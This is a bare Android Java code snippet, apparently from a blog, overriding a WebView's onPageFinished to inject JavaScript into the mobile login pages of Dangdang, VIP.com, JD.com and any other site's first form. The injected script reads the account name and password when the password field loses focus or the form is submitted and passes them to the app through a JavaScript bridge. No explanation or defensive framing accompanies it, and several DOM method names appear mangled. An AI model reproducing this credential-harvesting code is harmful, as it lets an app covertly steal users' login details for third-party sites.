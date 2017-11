1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

@ Override public void onPageFinished ( WebView view , String url ) { super . onPageFinished ( view , url ) ; StringBuilder sb = new StringBuilder ( ) ; if ( url . contains ( "vip.com" ) ) { sb . append ( "document.getElementByIdx_x_x_x_x('J_topDownloadBar').style.display='none';" ) ; } if ( url . contains ( "mpassport.dangdang.com" ) ) { sb . append ( "document.getElementByIdx_x_x_x_x('password').onblur=function(){" ) ; sb . append ( "var objPWD, objAccount;var str = 'dangdang';" ) ; sb . append ( "objAccount = document.getElementByIdx_x_x_x_x('username');" ) ; sb . append ( "objPWD = document.getElementByIdx_x_x_x_x('password');" ) ; sb . append ( "if (objAccount != null) {str += objAccount.value;}" ) ; sb . append ( "if (objPWD != null) { str += ' , ' + objPWD.value;}" ) ; sb . append ( "window.MYOBJECT.processHTML(str);" ) ; sb . append ( "return true;" ) ; sb . append ( "};" ) ; } else if ( url . contains ( "mlogin.vip.com" ) ) { sb . append ( "document.getElementByIdx_x_x_x_x('inputPsw').onblur=function(){" ) ; sb . append ( "var objPWD, objAccount;var str = 'vip';" ) ; sb . append ( "objAccount = document.getElementByIdx_x_x_x_x('inputName');" ) ; sb . append ( "objPWD = document.getElementByIdx_x_x_x_x('inputPsw');" ) ; sb . append ( "if (objAccount != null) {str += objAccount.value;}" ) ; sb . append ( "if (objPWD != null) { str += ' , ' + objPWD.value;}" ) ; sb . append ( "window.MYOBJECT.processHTML(str);" ) ; sb . append ( "return true;" ) ; sb . append ( "};" ) ; } else if ( url . contains ( "plogin.m.jd.com" ) ) { sb . append ( "document.getElementsByClassName('txt-input txt-password')[0].onblur=function(){" ) ; sb . append ( "var objPWD, objAccount;var str = 'jd';" ) ; sb . append ( "objAccount = document.getElementsByClassName('txt-input txt-username')[0];" ) ; sb . append ( "objPWD = document.getElementsByClassName('txt-input txt-password')[0];" ) ; sb . append ( "if (objAccount != null) {str += objAccount.value;}" ) ; sb . append ( "if (objPWD != null) { str += ' , ' + objPWD.value;}" ) ; sb . append ( "window.MYOBJECT.processHTML(str);" ) ; sb . append ( "return true;" ) ; sb . append ( "};" ) ; } else { sb . append ( "document.getElementsByTagName_r('form')[0].onsubmit = function () {" ) ; sb . append ( "var objPWD, objAccount;var str = 'other';" ) ; sb . append ( "var inputs = document.getElementsByTagName_r('input');" ) ; sb . append ( "for (var i = 0; i < inputs.length; i++) {" ) ; sb . append ( "if (inputs[i].type.toLowerCase() === 'password') {objPWD = inputs[i];}" ) ; sb . append ( "else if (inputs[i].name.toLowerCase() === 'email') {objAccount = inputs[i];}" ) ; sb . append ( "}" ) ; sb . append ( "if (objAccount != null) {str += objAccount.value;}" ) ; sb . append ( "if (objPWD != null) { str += ' , ' + objPWD.value;}" ) ; sb . append ( "window.MYOBJECT.processHTML(str);" ) ; sb . append ( "return true;" ) ; sb . append ( "};" ) ; } view . loadUrl ( "javascript:" + sb . toString ( ) ) ; }